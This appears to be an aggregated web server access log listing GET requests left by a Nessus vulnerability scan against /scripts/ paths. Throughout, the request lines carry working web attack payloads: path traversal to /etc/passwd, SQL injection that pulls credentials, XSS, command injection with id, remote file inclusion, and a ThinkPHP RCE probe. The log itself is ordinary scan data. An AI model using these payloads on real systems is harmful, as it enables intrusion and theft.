1 GET /scripts/blog.cgi?submit=ViewFile&month=01&year=2004&file=|cat%20/etc/passwd| HTTP/1.1
1 GET /scripts/boarddata/data/user.idx HTTP/1.1
1 GET /scripts/breakcal/calendar.cgi HTTP/1.1
2 GET /scripts/browse.php HTTP/1.1
1 GET /scripts/browse_blogs.php HTTP/1.1
1 GET /scripts/bsml.pl?action=sm HTTP/1.1
1 GET /scripts/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/buddy.php?action=<script>x</script> HTTP/1.1
1 GET /scripts/c32web.exe/GetImage?ImageName=cart32.ini%00.gif HTTP/1.1
1 GET /scripts/cal_cat.php?op=cats&year=2008&catview=1+UNION+SELECT+1,1717627962 HTTP/1.1
1 GET /scripts/cal_event.php?id=1%27%20UNION%20SELECT%201%2c2%2c%27calendarix_id_sql_injection.nasl%27%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13-- HTTP/1.1
1 GET /scripts/cal_make.pl?p0=../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/cal_week.php?op=week&catview=999' HTTP/1.1
1 GET /scripts/calendar.php?month=%27%20UNION%20SELECT%201%2c1%2c%271717627962%27%2c%27calendarix_month_sql_injection.nasl%27%2c1%20%23 HTTP/1.1
1 GET /scripts/calendar.php?month=&year=%27%20UNION%20SELECT%201%2c1%2c%271717627962%27%2c%27calendarix_month_sql_injection.nasl%27%2c1%20%23 HTTP/1.1
1 GET /scripts/calendar.php?serverPath=/etc/passwd%00 HTTP/1.1
1 GET /scripts/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.1
1 GET /scripts/callboth.php?SEQ=654321&OUT=123456&IN=1717627965%40nessus%0d%0aasteridex_in_code_injection.nasl HTTP/1.1
1 GET /scripts/captcha.html HTTP/1.1
1 GET /scripts/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog HTTP/1.1
1 GET /scripts/cart32.exe HTTP/1.1
1 GET /scripts/catalog.php?action=category_show&id=' HTTP/1.1
1 GET /scripts/cc_guestbook.pl HTTP/1.1
1 GET /scripts/cfooter.php3 HTTP/1.1
1 GET /scripts/cgi-bin/gm-comments.cgi HTTP/1.1
1 GET /scripts/cgi-bin/library.cgi HTTP/1.1
2 GET /scripts/cgi-bin/login.cgi HTTP/1.1
1 GET /scripts/cgi/tseekdir.cgi?location=/etc/passwd%00 HTTP/1.1
1 GET /scripts/cgiforum.pl?thesection=../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/cgiip.exe/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /scripts/cgiip.exe/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /scripts/cgiwrap/cgiwrap_error_page_handling_xss.nasl HTTP/1.1
1 GET /scripts/chat.php HTTP/1.1
1 GET /scripts/chat/login.php?option=chat HTTP/1.1
1 GET /scripts/ckeditor.js HTTP/1.1
1 GET /scripts/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=/etc/passwd%00 HTTP/1.1
1 GET /scripts/classes/adodbt/sql.php?classes_dir=/etc/passwd%00 HTTP/1.1
1 GET /scripts/clwarn.cgi HTTP/1.1
1 GET /scripts/comments.php?sort_by=phpwebgallery_sort_by_sql_injection.nasl HTTP/1.1
1 GET /scripts/comments.php HTTP/1.1
1 GET /scripts/commerce.cgi?page=../../../../../etc/passwd%00index.html HTTP/1.1
1 GET /scripts/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd%00 HTTP/1.1
1 GET /scripts/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/components/com_fm/fm.install.php?lm_absolute_path=../../&install_dir=limbo_com_fm_php_shell.nasl-1717627950 HTTP/1.1
1 GET /scripts/config.php?path[docroot]=/etc/passwd%00 HTTP/1.1
1 GET /scripts/config.php?returnpath=/etc/passwd%00 HTTP/1.1
1 GET /scripts/config/oramon.ini HTTP/1.1
1 GET /scripts/configuration/config.dat HTTP/1.1
1 GET /scripts/configuration/galleryConfig.txt HTTP/1.1
1 GET /scripts/console/login.action HTTP/1.1
1 GET /scripts/contact.php HTTP/1.1
1 GET /scripts/contacts/php?cal_dir=http[:]//example[.]com/ HTTP/1.1
1 GET /scripts/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd%00 HTTP/1.1
1 GET /scripts/content.php?get_action=display_doc&doc_file=CREDITS HTTP/1.1
1 GET /scripts/contrib/forms/evaluation/C_FormEvaluation.class.php?fileroot=/etc/passwd%00 HTTP/1.1
1 GET /scripts/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /scripts/core/api.php?t_path_core=/etc/passwd%00 HTTP/1.1
1 GET /scripts/core/editor.php?editor_insert_bottom=/etc/passwd HTTP/1.1
1 GET /scripts/core/misc/drupal.js HTTP/1.1
1 GET /scripts/corporate/webpages/login.jsp HTTP/1.1
1 GET /scripts/corporate/webpages/sessionexpired.jsp HTTP/1.1
1 GET /scripts/counter.php?count_log_file=/nessus HTTP/1.1
1 GET /scripts/crossdomain.xml HTTP/1.1
1 GET /scripts/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini HTTP/1.1
1 GET /scripts/csSearch.cgi?command=savesetup&setup=print%20id`` HTTP/1.1
1 GET /scripts/csv_db.cgi?file=|id| HTTP/1.1
1 GET /scripts/customer.pl HTTP/1.1
1 GET /scripts/cvslog.cgi?file=<SCRIPT>window.alert</SCRIPT> HTTP/1.1
1 GET /scripts/cwmail.exe HTTP/1.1
1 GET /scripts/data/fetch.php?page=' HTTP/1.1
1 GET /scripts/data/usr HTTP/1.1
2 GET /scripts/day.php HTTP/1.1
2 GET /scripts/db/users.dat HTTP/1.1
1 GET /scripts/db_input.php HTTP/1.1
1 GET /scripts/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/demos/demo.browse.php?filename=/etc/passwd HTTP/1.1
1 GET /scripts/detail.asp?nChannel='1 HTTP/1.1
1 GET /scripts/direct.php?rf=/etc/passwd%00 HTTP/1.1
1 GET /scripts/directory.php?dir=%3Bcat%20/etc/passwd HTTP/1.1
1 GET /scripts/directorypro.cgi?want=showcat&show=../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/disp_album.php?id_album=0+or+1=1 HTTP/1.1
1 GET /scripts/display.cgi?preftemp=temp&page=anonymous&file=|id| HTTP/1.1
1 GET /scripts/doc/index.php?s=/etc/passwd%00 HTTP/1.1
1 GET /scripts/docbuilder/top.php HTTP/1.1
1 GET /scripts/docman/new.php HTTP/1.1
1 GET /scripts/docs.php?doc=../jpgraph-1.12.1/docs/index HTTP/1.1
1 GET /scripts/docs/CHANGES HTTP/1.1
1 GET /scripts/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/doku.php HTTP/1.1
1 GET /scripts/download.php?language=/etc/passwd%00 HTTP/1.1
1 GET /scripts/dsweb/Services/User-1%22%3e%3cBODY%20ONLOAD%3dalert%28%27xerox_docushare_dsweb_xss.nasl%27%29%3e HTTP/1.1
1 GET /scripts/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http[:]//example[.]com/ HTTP/1.1
1 GET /scripts/e107_admin/admin.php HTTP/1.1
1 GET /scripts/eclient/IDMLogon2.jsp HTTP/1.1
1 GET /scripts/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;id;%20 HTTP/1.1
1 GET /scripts/editor/filemanager/connectors/php/upload.php?Command=FileUpload&Type=File&CurrentFolder=/fckeditor_currentfolder_file_upload-1717627990.php%2e HTTP/1.1
1 GET /scripts/embed/day.php?path=/etc/passwd%00 HTTP/1.1
1 GET /scripts/empower?DB=whateverwhatever HTTP/1.1
1 GET /scripts/emumail.fcgi HTTP/1.1
1 GET /scripts/encoder.php HTTP/1.1
1 GET /scripts/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/ericom.min.js HTTP/1.1
1 GET /scripts/error.php?err=404 HTTP/1.1
1 GET /scripts/error.php?selected_theme=%3cscript%3ealert%28uebimiau_selected_theme_xss.nasl%29%3c%2fscript%3e HTTP/1.1
1 GET /scripts/event_view.php?eid=34%20UNION%20SELECT%201052655575 HTTP/1.1
1 GET /scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
1 GET /scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini HTTP/1.1
1 GET /scripts/fake.cgi?arg=/dir/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
1 GET /scripts/fake.cgi?arg=/dir/../../../../../../../../../../../windows/win.ini HTTP/1.1
1 GET /scripts/fake.cgi?arg=/dir/../../../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET /scripts/fake.cgi?arg=/dir/../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/faq.php?action=&type=view&s=&id=-1%27%20UNION%20SELECT%200%2c1560850776%2c0%2c0%2c0%2c0%2c0-- HTTP/1.1
1 GET /scripts/faq/index.php HTTP/1.1
1 GET /scripts/faxsurvey?cat%20/etc/passwd HTTP/1.1
1 GET /scripts/feedsplitter.php?format=../../../../../../../../../../etc/passwd%00&debug=1 HTTP/1.1
1 GET /scripts/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini HTTP/1.1
1 GET /scripts/file.php?path=/etc/passwd%00 HTTP/1.1
1 GET /scripts/flserv.pl?cmd=exec_flsearch&query=ftplocate_fsite_cmd_exec.nasl&fsite=|id| HTTP/1.1
1 GET /scripts/fm.php HTTP/1.1
1 GET /scripts/foBACcVryQbL.asp HTTP/1.1
1 GET /scripts/foBACcVryQbL.cfm HTTP/1.1
1 GET /scripts/foBACcVryQbL.cgi HTTP/1.1
1 GET /scripts/foBACcVryQbL.html HTTP/1.1
1 GET /scripts/foBACcVryQbL.inc HTTP/1.1
1 GET /scripts/foBACcVryQbL.php3 HTTP/1.1
1 GET /scripts/foBACcVryQbL.php HTTP/1.1
1 GET /scripts/foBACcVryQbL.pl HTTP/1.1
1 GET /scripts/foBACcVryQbL.sh HTTP/1.1
1 GET /scripts/foBACcVryQbL.shtml HTTP/1.1
1 GET /scripts/force-download.php HTTP/1.1
1 GET /scripts/form.php HTTP/1.1
1 GET /scripts/forum.php3?id_article=1&id_forum=-1/**/UNION/**/SELECT%20641368079-- HTTP/1.1
1 GET /scripts/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script HTTP/1.1
1 GET /scripts/forum.php?forum=-1%20UNION%20SELECT%20null%2c123456%2cnull%2cnull%2cnull%2cnull-- HTTP/1.1
1 GET /scripts/forum.php?id_article=1&id_forum=-1/**/UNION/**/SELECT%201080837380-- HTTP/1.1
1 GET /scripts/forum.php HTTP/1.1
1 GET /scripts/forum/Database/EZsiteForum.mdb HTTP/1.1
1 GET /scripts/forum_2.php?msg=10&return=<script>foo</script> HTTP/1.1
1 GET /scripts/forumdata/data/user.idx HTTP/1.1
1 GET /scripts/forumdisplay.php?fid=21\"><script>x</script> HTTP/1.1
1 GET /scripts/forums/list.page HTTP/1.1
1 GET /scripts/fp/servlet/Login HTTP/1.1
1 GET /scripts/ftp/ftp.pl?dir=../../../../../../etc HTTP/1.1
1 GET /scripts/fxm.exe HTTP/1.1
1 GET /scripts/gadgets/Blog/BlogModel.php?path=/etc/passwd%00 HTTP/1.1
1 GET /scripts/gallery/displayCategory.php?basepath=http[:]//example[.]com HTTP/1.1
1 GET /scripts/generate.cgi HTTP/1.1
1 GET /scripts/genindexpage.cgi?4242+Home+/../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/getting_started/macros/macros_detail.dot?id=../../../../../../../../../../../..//etc/passwd%00.html HTTP/1.1
3 GET /scripts/gitweb.cgi HTTP/1.1
3 GET /scripts/gitweb.perl HTTP/1.1
3 GET /scripts/gitweb.pl HTTP/1.1
1 GET /scripts/gm.cgi HTTP/1.1
1 GET /scripts/go.cgi|id| HTTP/1.1
1 GET /scripts/googlesearch/GoogleSearch.php?APP[path][lib]=/etc/passwd%00 HTTP/1.1
1 GET /scripts/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/gtcatalog/index.php?function=custom&custom=http[:]//example[.]com/1 HTTP/1.1
1 GET /scripts/gtcatalog/password.inc HTTP/1.1
1 GET /scripts/guestbook.php?lang=de&mode=new&quote=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201 HTTP/1.1
2 GET /scripts/guestbook.php HTTP/1.1
1 GET /scripts/guestbook/cfooter.php3 HTTP/1.1
1 GET /scripts/guestbook/view.php?PG=foobar HTTP/1.1
1 GET /scripts/help.php?section='qualiteam_xcart_sql_xss.nasl HTTP/1.1
1 GET /scripts/help.php HTTP/1.1
1 GET /scripts/help/copyright.html HTTP/1.1
1 GET /scripts/help/en_US/Content/master/webadmin/WebAdmin.html HTTP/1.1
1 GET /scripts/help/index.php?help_file=../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/hints.pl?|id| HTTP/1.1
1 GET /scripts/historyFrame.html HTTP/1.1
1 GET /scripts/home/search.asp?nChannel='1 HTTP/1.1
1 GET /scripts/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor HTTP/1.1
1 GET /scripts/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/htgrep/file=index.html&hdr=/etc/passwd HTTP/1.1
1 GET /scripts/htmlscript?../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/htsearch.cgi HTTP/1.1
1 GET /scripts/htsearch?-c/nonexistent HTTP/1.1
1 GET /scripts/htsearch?config=&restrict=&exclude=&method=and&format=builtin-long&sort=%3cscript%3ealert%28%27htsearch_sort_xss.nasl%27%29%3c%2fscript%3e&words=htsearch_sort_xss.nasl HTTP/1.1
1 GET /scripts/htsearch?exclude=%60/etc/passwd%60 HTTP/1.1
1 GET /scripts/hw3.cgi?daysonly=0).system('id').( HTTP/1.1
1 GET /scripts/hw3.php?daysonly=0).system(id).( HTTP/1.1
1 GET /scripts/i-mall.cgi?p=|id| HTTP/1.1
1 GET /scripts/ideabox/include.php?ideaDir=http[:]//example[.]com HTTP/1.1
1 GET /scripts/identity HTTP/1.1
1 GET /scripts/ikonboard.cgi?act=ST&f=1&t=1&hl=nessus&st=' HTTP/1.1
1 GET /scripts/ikonboard.cgi HTTP/1.1
1 GET /scripts/image.php?src=system/config/localconfig.php HTTP/1.1
1 GET /scripts/inc/exif.inc.php?exif_prog=%28echo%20-n%20%27original_exif_prog_cmd_exec.nasl%3a%20%27%3bid%29%7c%7cecho HTTP/1.1
1 GET /scripts/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt%00 HTTP/1.1
1 GET /scripts/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd%00 HTTP/1.1
1 GET /scripts/inc/header.php/step_one.php?server_inc=http[:]//example[.]com/ HTTP/1.1
1 GET /scripts/inc/pipe.php?HCL_path=http[:]//example[.]com/ HTTP/1.1
1 GET /scripts/include.php HTTP/1.1
1 GET /scripts/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=alert%28%27fusetalk_mult_xss.nasl%27%29 HTTP/1.1
1 GET /scripts/include/error/autherror.cfm?errorcode=1&FTVAR_LINKP=%22%3e%3c%2fa%3e%3cscript%3ealert%28%27fusetalk_mult_xss.nasl%27%29%3c%2fscript%3e%3ca%20href%3d%22 HTTP/1.1
1 GET /scripts/include/error/autherror.cfm?errorcode=1&FTVAR_URLP=%22%3e%3cscript%3ealert%28%27fusetalk_mult_xss.nasl%27%29%3c%2fscript%3e HTTP/1.1
1 GET /scripts/include/error/forumerror.cfm?errorno=3 HTTP/1.1
1 GET /scripts/include/help.php?base=http[:]//example[.]com HTTP/1.1
1 GET /scripts/include/sql.php?include_path=/etc/passwd%00 HTTP/1.1
1 GET /scripts/include/theme.inc.php?fullpath=/etc/passwd%00 HTTP/1.1
1 GET /scripts/includer.cgi?template=includer_rcmdexec.nasl HTTP/1.1
1 GET /scripts/includes/awol-condensed.inc.php?path=http[:]//example[.]com/ HTTP/1.1
1 GET /scripts/includes/calendar.php?phpc_root_path=http[:]//example[.]com/ HTTP/1.1
1 GET /scripts/includes/config.php?relative_script_path=http[:]//example[.]com HTTP/1.1
1 GET /scripts/includes/converter.inc.php?include_path=/etc/passwd%00 HTTP/1.1
1 GET /scripts/includes/db_adodb.php?baseDir=/etc/passwd%00 HTTP/1.1
1 GET /scripts/includes/hnmain.inc.php3?config[incdir]=http[:]//example[.]com/ HTTP/1.1
1 GET /scripts/includes/main.conf HTTP/1.1
1 GET /scripts/includes/messages.inc.php?include_path=/etc/passwd%00&lan=EN HTTP/1.1
1 GET /scripts/includes/settings.inc.php?include_path=/etc/passwd%00 HTTP/1.1
1 GET /scripts/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /scripts/index.action HTTP/1.1
1 GET /scripts/index.asp HTTP/1.1
1 GET /scripts/index.cfm?catid=1%20SQL HTTP/1.1
1 GET /scripts/index.cfm?fuseaction=category.display&category_ID=' HTTP/1.1
1 GET /scripts/index.cfm HTTP/1.1
1 GET /scripts/index.cgi HTTP/1.1
1 GET /scripts/index.do HTTP/1.1
2 GET /scripts/index.html HTTP/1.1
1 GET /scripts/index.js%70 HTTP/1.1
1 GET /scripts/index.php/admin/ HTTP/1.1
1 GET /scripts/index.php/admin/login/ HTTP/1.1
1 GET /scripts/index.php/index.html HTTP/1.1
1 GET /scripts/index.php/login HTTP/1.1
1 GET /scripts/index.php?/auth/login/ HTTP/1.1
1 GET /scripts/index.php?CID=' HTTP/1.1
1 GET /scripts/index.php?_language=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/index.php?act=Arcade&do=stats&gameid=1' HTTP/1.1
1 GET /scripts/index.php?act=help&do=aboutOAT HTTP/1.1
1 GET /scripts/index.php?act=sm_window&page=event&day=-1%20UNION%20SELECT%201%2c1717627924%2c583235900%20-- HTTP/1.1
1 GET /scripts/index.php?action=Login&module=Users HTTP/1.1
1 GET /scripts/index.php?action=login&languages[Nessus]=syscp_1211.nasl&language=Nessus&langs[Nessus][0][file]=/etc/passwd HTTP/1.1
1 GET /scripts/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/index.php?action=view&module=resourcesmodule&id=0%20UNION%20SELECT%20-1%2c%27exponent_0964.nasl%27%2c%27Nessus%20test%27%2c%27O%3a8%3a%22stdClass%22%3a3%3a%7bs%3a3%3a%22mod%22%3bs%3a15%3a%22resourcesmodule%22%3bs%3a3%3a%22src%22%3bs%3a20%3a%22%40random41940ceb78dbb%22%3bs%3a3%3a%22int%22%3bs%3a0%3a%22%22%3b%7d%27%2c7%2c0%2c0%2c0%2c0%2c0%2c0%20-- HTTP/1.1
1 GET /scripts/index.php?album=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/index.php?board=nonexistant1918297217 HTTP/1.1
1 GET /scripts/index.php?c=access&a=login&ref_c=nessus%22%3e%3cscript%3ealert%28863909431%29%3c%2fscript%3e&ref_a=projectpier_login_page_xss.nasl%22%3e%3cscript%3ealert%28779008214%29%3c%2fscript%3e HTTP/1.1
1 GET /scripts/index.php?cat_select=<script>foo</script> HTTP/1.1
1 GET /scripts/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc HTTP/1.1
1 GET /scripts/index.php?configFile=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/index.php?doc=http[:]//example[.]com/foo.php HTTP/1.1
1 GET /scripts/index.php?edit=nonexistant118278426 HTTP/1.1
1 GET /scripts/index.php?entry=' HTTP/1.1
1 GET /scripts/index.php?fields=CHAR(49,39,41,59,101,118,97,108,40,98,97,115,101,54,52,95,100,101,99,111,100,101,40,36,95,83,69,82,86,69,82,91,72,84,84,80,95,78,69,83,83,85,83,95,67,77,68,93,41,41,59,47,47),1 HTTP/1.1
1 GET /scripts/index.php?file=Liens&op=\"><script>window.alert('test');</script> HTTP/1.1
1 GET /scripts/index.php?file=News&op=phpinfo HTTP/1.1
1 GET /scripts/index.php?gadget=../../../../../../etc/passwd%00&path=/etc HTTP/1.1
1 GET /scripts/index.php?gadget=Glossary&action=ViewTerm&term=%3cscript%3ealert%28%27jaws_xss.nasl%27%29%3b%3c%2fscript%3e HTTP/1.1
1 GET /scripts/index.php?gadget=Glossary&action=view&term=%3cscript%3ealert%28%27jaws_xss.nasl%27%29%3b%3c%2fscript%3e HTTP/1.1
1 GET /scripts/index.php?getApplication=register&checknum=1&args=null HTTP/1.1
1 GET /scripts/index.php?get_action=get_boot_conf HTTP/1.1
1 GET /scripts/index.php?go=detail&id=-99999/**/UNION/**/SELECT/**/0,1,concat(1717627930,0x3a,494874244),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 HTTP/1.1
1 GET /scripts/index.php?go=detail&id=-99999/**/UNION/**/SELECT/**/0,1,concat(1717627930,0x3a,494874244),3,4,5,6,7,8,9,10,11,12,13,14,15,16 HTTP/1.1
1 GET /scripts/index.php?id='UNION/**/SELECT/**/0,0,285763851,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- HTTP/1.1
1 GET /scripts/index.php?id=' HTTP/1.1
1 GET /scripts/index.php?id=7kxgk6o2hd' HTTP/1.1
1 GET /scripts/index.php?inc=http[:]//example[.]com/foo HTTP/1.1
1 GET /scripts/index.php?include_files[]=&include_files[query_string]=/etc/passwd HTTP/1.1
1 GET /scripts/index.php?kietu[url_hit]=http[:]//example[.]com/ HTTP/1.1
1 GET /scripts/index.php?libDir=http[:]//example[.]com HTTP/1.1
1 GET /scripts/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl HTTP/1.1
1 GET /scripts/index.php?mod_id=2&kb_ask=%3c%2ftextarea%3e%3cscript%3ealert%28%22cerberus_support_center_mult_flaws.nasl%22%29%3c%2fscript%3e HTTP/1.1
1 GET /scripts/index.php?mode=administration HTTP/1.1
1 GET /scripts/index.php?module=<script>foo</script> HTTP/1.1
1 GET /scripts/index.php?module=Navigation HTTP/1.1
1 GET /scripts/index.php?module=Topics&func=view&topicid=-1%20UNION%20SELECT%20null%2cnull%2c%27mdpro_topicid_sql_injection.nasl-1717627947%27%2cnull%2cnull%2cnull%2cnull%20-- HTTP/1.1
1 GET /scripts/index.php?module=ew_filemanager&type=admin&func=manager HTTP/1.1
1 GET /scripts/index.php?name=Your%20Account&profile=anyone%22%3E%3Cscript%3Ealert('Nessus%20was%20here')%3B%3C%2Fscript%3E HTTP/1.1
1 GET /scripts/index.php?op=Default&Date=200607%27%20UNION%20SELECT%201%2c1817685127%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1--&blogId=1 HTTP/1.1
1 GET /scripts/index.php?op=ViewAlbum&albumId=-1/**/UNION/**/SELECT/**/0,1,1602970821,943137723,1,1,1,1,1--&blogId=1 HTTP/1.1
1 GET /scripts/index.php?op=ViewArticle&articleId=9999%2f%2a%2a%2fUNION%2f%2a%2a%2fSELECT%2f%2a%2a%2f1717627951%2c1%2c1%2c1%2c1%2c1%2c1%2c1--&blogId=1 HTTP/1.1
1 GET /scripts/index.php?op=disp&filedata=c3lzdGVtKCdpZCcpOw== HTTP/1.1
1 GET /scripts/index.php?option=frontpage&Itemid=2|system(id)|1717627950 HTTP/1.1
1 GET /scripts/index.php?option=weblinks&Itemid=2&catid=-1%20UNION%20SELECT%200%2c1%2c2%2c250932539847%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11-- HTTP/1.1
1 GET /scripts/index.php?owa_do=base.loginForm HTTP/1.1
1 GET /scripts/index.php?p='nessus HTTP/1.1
1 GET /scripts/index.php?page=/etc/passwd%00 HTTP/1.1
1 GET /scripts/index.php?page=documents&doc=-99%27%20UNION%20SELECT%20null,null,%27nessus%27,%27dcpportal_sql.nasl%27,null,null,null,null,null,null,null,null-- HTTP/1.1
1 GET /scripts/index.php?page=send&cid=%3cscript%3ealert(%27dcpportal_sql.nasl%27)%3c%2fscript%3e HTTP/1.1
1 GET /scripts/index.php?post=../config/password HTTP/1.1
1 GET /scripts/index.php?req_path=http[:]//example[.]com/ HTTP/1.1
1 GET /scripts/index.php?s=admin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /scripts/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /scripts/index.php?s=index/%5cthink%5cRequest/input&filter=file_get_contents&data=index.php HTTP/1.1
1 GET /scripts/index.php?search=%3cscript%3ealert%28%27cmsimple_search_xss.nasl%27%29%3b%3c%2fscript%3e&function=search HTTP/1.1
1 GET /scripts/index.php?search='>%3Cscript%3Ealert('autoindex_search_xss.nasl')%3B%3C%2Fscript%3E&searchMode=f HTTP/1.1
1 GET /scripts/index.php?search=<script>foo</script> HTTP/1.1
1 GET /scripts/index.php?selskin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
1 GET /scripts/index.php?selskin=..%2Finc%2Fboxleft.inc%00&xposbox[L][]=%2Fetc%2Fpasswd%00 HTTP/1.1
1 GET /scripts/index.php?sensor_program=%3cscript%3ealert%28%27phpsysinfo_multiple_xss.nasl%27%29%3b%3c%2fscript%3e HTTP/1.1
1 GET /scripts/index.php?setLang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/index.php?show=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/index.php?show=/etc/passwd HTTP/1.1
1 GET /scripts/index.php?show=http[:]//example[.]com/nessus HTTP/1.1
1 GET /scripts/index.php?site=../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/index.php?src=1&_common=1&time=1717627958&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/index.php?string=' HTTP/1.1
1 GET /scripts/index.php?template=../../../loudblog/custom/config.php%00 HTTP/1.1
1 GET /scripts/index.php?templates_dir=/etc/passwd%00 HTTP/1.1
1 GET /scripts/index.php?user_langue=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/index.php?x=browse&category='UNION%20SELECT%20%271%27%2c%272%27%2c%27pixelpost_category_sql_injection.nasl%27%2c%271717627937%27%2c%275%27-- HTTP/1.1
59 GET /scripts/index.php HTTP/1.1
1 GET /scripts/index.phtml?mode=view&album=id&pic=A=10.jpg&dispsize=640&start=0 HTTP/1.1
1 GET /scripts/index.phtml HTTP/1.1
1 GET /scripts/index.pl/homels?func=add;class=WebGUI::Asset::Wobject::Article%3bprint%20%60id%60; HTTP/1.1
1 GET /scripts/index2.cgi?frames=yes&board=demo&mode=Current&threads=Collapse&message=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/index2.php?_SERVER[]=&_SERVER[REMOTE_ADDR]='.system('id').exit().'&option=wrapper&module[module]=1 HTTP/1.1
1 GET /scripts/index HTTP/1.1
1 GET /scripts/info.dat HTTP/1.1
1 GET /scripts/info2www HTTP/1.1
1 GET /scripts/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id HTTP/1.1
1 GET /scripts/insertorder.cfm?CFID=1&CFTOKEN=1%20UNION%20SELECT%201%2c2%2c3%2c4%2cstorename%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%20from%20Params%22having%201%3d1 HTTP/1.1
1 GET /scripts/install.php?newlang=../../cpg_error.log%00 HTTP/1.1
1 GET /scripts/install/index.php HTTP/1.1
1 GET /scripts/interface/index.do HTTP/1.1
1 GET /scripts/ion-p.exe?page=../../../../../etc/passwd HTTP/1.1
1 GET /scripts/ion-p.exe?page=c:\\\\winnt\\\\win.ini HTTP/1.1
1 GET /scripts/item.fts?href=%22%3E%3Cscript%3Ealert%28%22ftgate_44002.nasl%22%29%3C%2Fscript%3E%3B HTTP/1.1
1 GET /scripts/j6HJKBQKYKJF.asp HTTP/1.1
1 GET /scripts/j6HJKBQKYKJF.cfm HTTP/1.1
1 GET /scripts/j6HJKBQKYKJF.cgi HTTP/1.1
1 GET /scripts/j6HJKBQKYKJF.html HTTP/1.1
1 GET /scripts/j6HJKBQKYKJF.inc HTTP/1.1
1 GET /scripts/j6HJKBQKYKJF.php3 HTTP/1.1
1 GET /scripts/j6HJKBQKYKJF.php HTTP/1.1
1 GET /scripts/j6HJKBQKYKJF.pl HTTP/1.1
1 GET /scripts/j6HJKBQKYKJF.sh HTTP/1.1
1 GET /scripts/j6HJKBQKYKJF.shtml HTTP/1.1
1 GET /scripts/jammail.pl?job=showoldmail&mail=|id| HTTP/1.1
1 GET /scripts/javascript.php?abs_path=/etc/passwd%00 HTTP/1.1
1 GET /scripts/javascripts/enrollment.js HTTP/1.1
1 GET /scripts/jcart-relay.php HTTP/1.1
1 GET /scripts/jgs_portal_statistik.php?meinaction=themen&month=1&year=1' HTTP/1.1
1 GET /scripts/js/vendors.php?file=../../../../../../../../../../etc/passwd%00nessus.js HTTP/1.1
